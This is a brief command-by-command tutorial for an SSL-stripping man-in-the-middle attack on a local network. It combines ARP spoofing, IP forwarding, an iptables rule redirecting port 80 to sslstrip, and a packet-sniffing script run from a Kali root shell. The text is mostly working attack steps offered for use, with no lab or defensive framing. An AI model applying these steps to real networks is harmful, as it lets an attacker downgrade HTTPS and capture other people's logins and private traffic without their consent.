To downgrade the https to http you can use a tool sslstrip developed by moxie0 you can see the offial Github repo for more details and download it.
- First flush the iptables
root@kali:~# iptables --flush
- Use the arp_spoofer tool to do the attack :
root@kali:~# python arp_spoof.py
- Enable the port forwarding to act as a router
root@kali:~# iptables --flush
root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
- Run the sslstrip :
root@kali:~# sslstrip
- Since sslstrip runs the port bydefault 10000 and we recives packets on 80 we need to forward it 10000
root@kali:~# iptables --flush
root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- Now once sslstrip is set up, now you can use the packet_sniffer to sniff the packets.
root@kali:~# python packet_sniffer.py
